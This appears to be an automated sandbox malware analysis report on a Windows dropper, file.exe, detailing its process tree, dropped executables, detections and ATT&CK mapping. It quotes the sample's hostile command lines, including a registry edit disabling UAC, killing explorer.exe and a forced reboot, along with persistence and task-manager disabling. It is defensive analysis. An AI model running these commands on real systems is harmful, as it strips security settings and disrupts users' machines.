Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	882703
MD5:	e2c4c4dd8c6a357eca164955a8fe040c
SHA1:	f4114815bce62efbc78c79f9a83ccf74a4ea075c
SHA256:	f3efe3b57a0f5cc46963dbd8832ceecd5768117685b4cee684b1235d9e74ebe5
Tags:	exe
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Changes the wallpaper picture

Uses shutdown.exe to shutdown or reboot the system

Yara detected BatToExe compiled binary

Machine Learning detection for sample

Disables the Windows task manager (taskmgr)

Machine Learning detection for dropped file

Disables UAC (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Drops PE files

Potential key logger detected (key state polling based)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

file.exe (PID: 3320 cmdline: C:\Users\user\Desktop\file.exe MD5: E2C4C4DD8C6A357ECA164955A8FE040C)

cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c CleanZUpdater.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Baldi.exe (PID: 3156 cmdline: C:\Baldi\Baldi.exe MD5: 515BC425DAA9558E4A12A917E7DFC701)

taskkill.exe (PID: 5436 cmdline: "C:\Windows\System32\taskkill.exe" /f /im explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

DisableUAC.exe (PID: 7140 cmdline: C:\Baldi\DisableUAC.exe MD5: 9AD923E0B582D7520DBD655C36C1CDD5)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6040 cmdline: C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

reg.exe (PID: 5744 cmdline: reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)

shutdown.exe (PID: 3816 cmdline: shutdown -r -t 1 -c "BALDI EVIL..." MD5: 7A22F98F0B7BAEEF5FE1965F075A5E95)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: DisableUAC.exe PID: 7140	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: cmd.exe PID: 6040	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 5744	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: shutdown.exe PID: 3816	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Click to see the 16 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 72%

Antivirus detection for dropped file

Source: C:\Baldi\Baldi.exe	Avira: detection malicious, Label: TR/BAS.Samca.amdgw
Source: C:\Baldi\kill.exe	Avira: detection malicious, Label: TR/AD.Nekark.sjwrf
Source: C:\Baldi\mbr.exe	Avira: detection malicious, Label: DR/Delphi.Gen

Multi AV Scanner detection for dropped file

Source: C:\Baldi\Baldi.exe	ReversingLabs: Detection: 70%
Source: C:\Baldi\DisableUAC.exe	ReversingLabs: Detection: 20%
Source: C:\Baldi\kill.exe	ReversingLabs: Detection: 75%
Source: C:\Baldi\mbr.exe	ReversingLabs: Detection: 70%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Baldi\kill.exe	Joe Sandbox ML: detected
Source: C:\Baldi\DisableUAC.exe	Joe Sandbox ML: detected

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040263E FindFirstFileA,

Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: <YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A equals www.youtube.com (Youtube)
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E36000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-AExperience Controls LibraryX equals www.youtube.com (Youtube)
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ~YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang equals www.youtube.com (Youtube)

Source: file.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: file.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Baldi.exe, 00000003.00000002.637111077.0000000002EEC000.00000004.00001000.00020000.00000000.sdmp, Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: https://vk.com/endnet
Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E36000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-AExperience
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang

Source: file.exe, 00000000.00000002.376997062.0000000000528000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Baldi\DisableUAC.exe

Code function: 4_2_000000014000E9BC GetFocus,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetClassNameA,strncmp,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetPropA,GetPropA,GetWindowThreadProcessId,GetCurrentProcessId,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404EE8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

Spam, unwanted Advertisements and Ransom Demands

Changes the wallpaper picture

Source: C:\Baldi\Baldi.exe

Key value created or modified: HKEY_CURRENT_USER\Control Panel\Desktop Wallpaper C:\Baldi\lol.png

Jump to behavior

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406128
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004046F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004068FF
Source: C:\Baldi\DisableUAC.exe	Code function: 4_3_021A79B8
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_000000014000A15C
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_0000000140012B80
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_00000001400127C0
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_000000014000DFD0

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

Source: Baldi.exe.0.dr

Static PE information: Number of sections : 12 > 10

Source: file.exe

ReversingLabs: Detection: 72%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nseED18.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.rans.evad.winEXE@19/8@0/0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004041FC GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Baldi\Baldi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Baldi\Baldi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat

Source: C:\Baldi\Baldi.exe

Window found: window name: TButton

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 4444053 > 1048576

Data Obfuscation

Yara detected BatToExe compiled binary

Source: Yara match	File source: 00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DisableUAC.exe PID: 7140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reg.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shutdown.exe PID: 3816, type: MEMORYSTR

Source: C:\Baldi\DisableUAC.exe

Code function: 4_2_000000014001BA98 push rax; retf

Source: Baldi.exe.0.dr	Static PE information: section name: .didata
Source: Baldi.exe.0.dr	Static PE information: section name: .debug
Source: DisableUAC.exe.0.dr	Static PE information: section name: .code
Source: kill.exe.0.dr	Static PE information: section name: .code

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\mbr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\DisableUAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\Baldi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\kill.exe	Jump to dropped file

Source: C:\Baldi\Baldi.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GG.exe			Jump to behavior
Source: C:\Baldi\Baldi.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GG.exe			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Baldi\mbr.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Baldi\kill.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040263E FindFirstFileA,

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Baldi\Baldi.exe

Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."

Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr

Binary or memory string: @Winapi@Windows@DOF_PROGMAN

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405A2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Lowering of HIPS / PFW / Operating System Security Settings

Disables the Windows task manager (taskmgr)

Source: C:\Baldi\Baldi.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Disables UAC (registry)

Source: C:\Windows\System32\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	21 Disable or Modify Tools	2 Input Capture	1 Security Software Discovery	Remote Services	2 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	11 System Shutdown/Reboot
